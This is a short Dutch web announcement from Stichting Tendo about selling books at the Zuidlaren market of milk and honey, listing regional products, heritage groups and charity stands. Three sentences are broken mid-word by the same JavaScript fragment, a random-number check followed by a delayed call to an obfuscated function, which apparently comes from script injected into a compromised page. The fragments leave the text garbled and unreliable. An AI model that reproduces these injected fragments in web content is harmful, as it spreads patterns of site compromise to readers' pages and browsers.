Tendo op de Bijenmarkt van Zuidlaren

A.s. zaterdag 6 augustus staan wij met onze boeken op de Markt van Melk en Honing in Zuidlaren. Dit is elk jaar een erg gezellige markt waarin ook dit jaar veel streekproducten zoals geitenkaas, paardenmelk, meel, jam en chutneys, kruiden, zalven en waskaarsen te vinden zijn.
​Er is ook aandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}acht voor het cultureel erfgoed: Molenmuseum  “de Wachter”, Het Drentse Landandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}schap en de Historische vereniging van Zuidlaren zijn vertegenwoordigd.
Tevens zijn er ook veel ” goede doelenstandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}s” zoals Stichting Tendo​ vertegenwoordigd. Maar ook Amnesty International, Dierenbescherming, IVN etc.
U bent van harte Welkom.
Bijenmarkt